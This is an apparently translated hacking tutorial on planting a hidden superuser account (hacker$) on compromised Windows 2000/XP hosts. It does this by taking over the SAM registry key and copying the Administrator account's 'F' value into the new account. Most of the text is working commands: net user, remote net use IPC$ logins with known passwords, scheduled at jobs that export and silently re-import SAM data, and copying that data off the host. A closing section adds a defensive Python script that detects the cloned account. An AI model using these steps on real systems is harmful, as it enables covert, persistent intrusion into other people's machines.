Multiple methods of creating a hidden superuser in the system

Source: Internet
Author: User

How to create a hidden super user in the graphical interface

The graphical method suits a compromised host that is reached locally or that has Terminal Services open on port 3389. The author I mentioned above described a method that works well but is more complex, and it also needs Psu.exe (a program that runs another program as the SYSTEM user), which would have to be uploaded to the compromised host. The method I describe here does not need Psu.exe. Windows 2000 has two registry editors, Regedit.exe and Regedt32.exe. On XP, Regedit.exe and Regedt32.exe are actually the same program, and the permissions on a key are changed by right-clicking it and choosing "Permissions". Everyone is familiar with Regedit.exe, but it cannot set permissions on registry keys; the biggest advantage of Regedt32.exe is that it can. Account information on NT/2000/XP is stored under the registry key HKEY_LOCAL_MACHINE\SAM\SAM, but no user other than the SYSTEM user is authorized to see it, so I first use Regedt32.exe to give myself Full Control permission on the SAM key. This makes it possible to read and write the information under the SAM key. The concrete steps are as follows:

1. Assuming that we are logged on to a compromised host through Terminal Services as the superuser Administrator, first create an account, hacker$, at the command line or in the account manager. Here I create it at the command line:

net user hacker$ 1234 /add

2. In Start/Run, type Regedt32.exe and press Enter to run Regedt32.exe.

3. Click "Permissions" and a window pops up.

Click Add to add the account I am logged in with to the security list. Here I am logged in as Administrator, so I add Administrator and set its permissions to "Full Control". One note: it is better to add the account you are logged in with, or the group it belongs to, and not to modify the existing accounts or groups, otherwise it brings a series of unnecessary problems. Once the hidden superuser has been built, come back here and delete the account you added.

4. Then click "Start" → "Run", type "Regedit.exe" and press Enter to start the Registry Editor, Regedit.exe. Open the key:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$

5. Export the keys hacker$, 00000409 and 000001F4 as Hacker.reg, 409.reg and 1f4.reg, and open the exported files in Notepad for editing. Copy the value "F" under the key 000001F4, which corresponds to the superuser, and overwrite with it the value "F" under the key 00000409, which corresponds to hacker$. Then merge 00000409.reg with Hacker.reg.

6. At the command line, run net user hacker$ /del to delete the user hacker$:

net user hacker$ /del

7. Press F5 in the Regedit.exe window to refresh, then choose File, Import Registry File and import the modified Hacker.reg into the registry.

8. At this point the hidden superuser hacker$ has been built; close Regedit.exe. In the Regedt32.exe window, change the permissions on the HKEY_LOCAL_MACHINE\SAM\SAM key back to the original (just delete the Administrator account that was added).

9. Note: once the hidden superuser is built, the user hacker$ cannot be seen in the account manager, nor with the "net user" command at the command line. After the superuser has been established, however, its password can no longer be changed: if the net user command is used to change the hacker$ password, the hidden superuser becomes visible again in the account manager and cannot be deleted.

How to create a hidden superuser remotely under the command line

Here the at command is used. Because a scheduled task created with at runs as the SYSTEM user, there is no need to use the Psu.exe program. To use the at command, the compromised host must have the Schedule service running. If it is not running, it can be started remotely with Netsvc.exe from the Streamer tools or with Sc.exe; other methods work as well, as long as they can start the Schedule service.

For the command-line method, various kinds of connection can be used, such as SqlExec connecting to MSSQL on port 1433, or the Telnet service, as long as you can get a command shell and have permission to run the at command.

1. First find a compromised host; how to find one is not the topic here. Assume we have found one with the superuser Administrator and the password 12345678, and now start creating a hidden superuser on it remotely from the command line. (The example host is a machine on my local area network; I have changed its IP address to 13.50.97.238. Please do not try this against that address on the Internet, so as to avoid harassing a normal IP address.)

2. First establish a connection with the compromised host. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"

3. Use the at command to create a user on the compromised host (if the Schedule service is not started, start it remotely with Netsvc.exe or sc.exe of the Banyan tree):

at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add

The user name is created with a trailing $ character because a user whose name ends in $ is not displayed by net user at the command line, although the user can still be seen in the account manager.

4. Also use the at command to export the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users:

at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e Hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\

/e is a parameter of regedit.exe, and the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with a \. If necessary, you can enclose c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ in quotation marks.

5. Download Hacker.reg from the compromised host to the local computer and open it in Notepad for editing. The command is:

copy \\13.50.97.238\admin$\system32\hacker.reg C:\hacker.reg

The editing method was already described in the graphical-interface section and is not repeated here.

6. Copy the edited Hacker.reg back to the compromised host:

copy C:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7. Check the time on the compromised host with net time \\13.50.97.238, then use the at command to delete the user hacker$:

at \\13.50.97.238 13:40 net user hacker$ /del

8. Verify that hacker$ has been deleted. Disconnect from the compromised host with:

net use \\13.50.97.238 /del

Then try to connect to it with the account hacker$:

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"

If the connection fails, the account has been deleted.

9. Then establish a connection with the compromised host again: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator". Get the host's time, then use the at command to import Hacker1.reg, which was copied back to the host, into its registry:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s Hacker1.reg

The regedit.exe parameter /s means quiet mode.

10. Verify that hacker$ has been established, using the same method as above for verifying that hacker$ was deleted.

11. Then verify whether the user hacker$ has read, write and delete permissions. If you are still not sure, you can also verify that it can create other accounts.

12. Step 11 confirms that the user hacker$ has superuser privileges: I originally created it with the at command as an ordinary user, but it now has remote read, write and delete permissions.
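
Seen from the defender's side, the edit in step 5 leaves a checkable trace: the cloned key keeps its own name (00000409) while its "F" value carries the RID of 000001F4. The following check over an export of the Users key is an added example, not part of the original article; the RID offset 0x30 inside "F", the function names and the sample export are assumptions constructed for illustration.

```python
import re

USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_OFFSET = 0x30  # assumption: commonly documented position of the RID in "F"

def parse_export(text):
    """Return ({rid: name}, {key_rid: rid_stored_in_F}) from a .reg export."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join continued hex lines
    names, f_rids, section = {}, {}, ""
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        if not section.upper().startswith(USERS.upper()):
            continue
        tail = section[len(USERS):].lstrip("\\")
        m = re.match(r"@=hex\(([0-9a-f]+)\):", line, re.I)
        if tail.lower().startswith("names\\") and m:
            names[int(m.group(1), 16)] = tail[6:]  # the value type is the RID
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tail) and line[:8].lower() == '"f"=hex:':
            raw = bytes(int(b, 16) for b in line[8:].split(",") if b)
            rid = raw[RID_OFFSET:RID_OFFSET + 4]
            if len(rid) == 4:
                f_rids[int(tail, 16)] = int.from_bytes(rid, "little")
    return names, f_rids

def find_anomalies(text):
    """Flag keys whose F value carries another account's RID, and $ names."""
    names, f_rids = parse_export(text)
    findings = []
    for key_rid, stored in sorted(f_rids.items()):
        who = names.get(key_rid, "?")
        if stored != key_rid:
            findings.append((who, f"key {key_rid:08X} holds RID {stored:#x} in F"))
        if who.endswith("$"):
            findings.append((who, "account name ends in $"))
    return findings

def sample_f(rid):  # constructed F value: zero padding, RID, regedit-style wrap
    hexs = ",".join(f"{b:02x}" for b in bytes(RID_OFFSET) + rid.to_bytes(4, "little"))
    return hexs[:60] + "\\\r\n  " + hexs[60:]

SAMPLE = "\r\n".join([  # constructed export, not taken from a real host
    "Windows Registry Editor Version 5.00", "",
    "[" + USERS + r"\000001F4]", '"F"=hex:' + sample_f(0x1F4), "",
    "[" + USERS + r"\00000409]", '"F"=hex:' + sample_f(0x1F4), "",
    "[" + USERS + r"\Names\Administrator]", "@=hex(1f4):", "",
    "[" + USERS + r"\Names\hacker$]", "@=hex(409):", "",
])
if __name__ == "__main__":
    print(find_anomalies(SAMPLE))
```

Regedit writes version 5.00 exports as UTF-16, so decode the file before passing its text to find_anomalies. A name ending in $ is only a weak signal on its own; the RID mismatch is the one that indicates a cloned "F" value.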
